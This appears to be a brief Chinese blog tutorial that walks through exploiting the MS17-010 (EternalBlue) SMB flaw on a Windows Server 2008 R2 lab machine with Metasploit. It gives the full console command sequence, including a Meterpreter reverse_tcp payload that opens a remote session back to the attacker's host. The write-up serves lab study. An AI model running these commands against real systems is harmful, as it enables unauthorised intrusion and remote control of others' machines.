使用metasploit(MSF)对windows的ms17-010漏洞进行利用的过程

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/u013672940/article/details/78200950

0x01 实验环境

攻击机:kali linux 

ip:10.10.10.131

目标机:windows 2008 R2

ip:10.10.10.132

0x02 配置exploit

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) > set rhost 10.10.10.132
rhost => 10.10.10.132

查看选项

msf exploit(ms17_010_eternalblue) > show options

设置目标机的IP,其他选项默认就可以;

注意:选项中说明了此exploit对应的目标系统,所以并不是具有该漏洞的系统都能利用此exploit;



0x03 配置payload

payload只需要配置监听返回会话的IP;

msf exploit(ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(ms17_010_eternalblue) > set lhost 10.10.10.131
lhost => 10.10.10.131


0x04 开始攻击

警告:攻击过程可能导致目标系统宕机重启,谨慎操作!

msf exploit(ms17_010_eternalblue) > exploit


成功获得session。


没有更多推荐了,返回首页

私密
私密原因:
请选择设置私密原因
  • 广告
  • 抄袭
  • 版权
  • 政治
  • 色情
  • 无意义
  • 其他
其他原因:
120
出错啦
系统繁忙,请稍后再试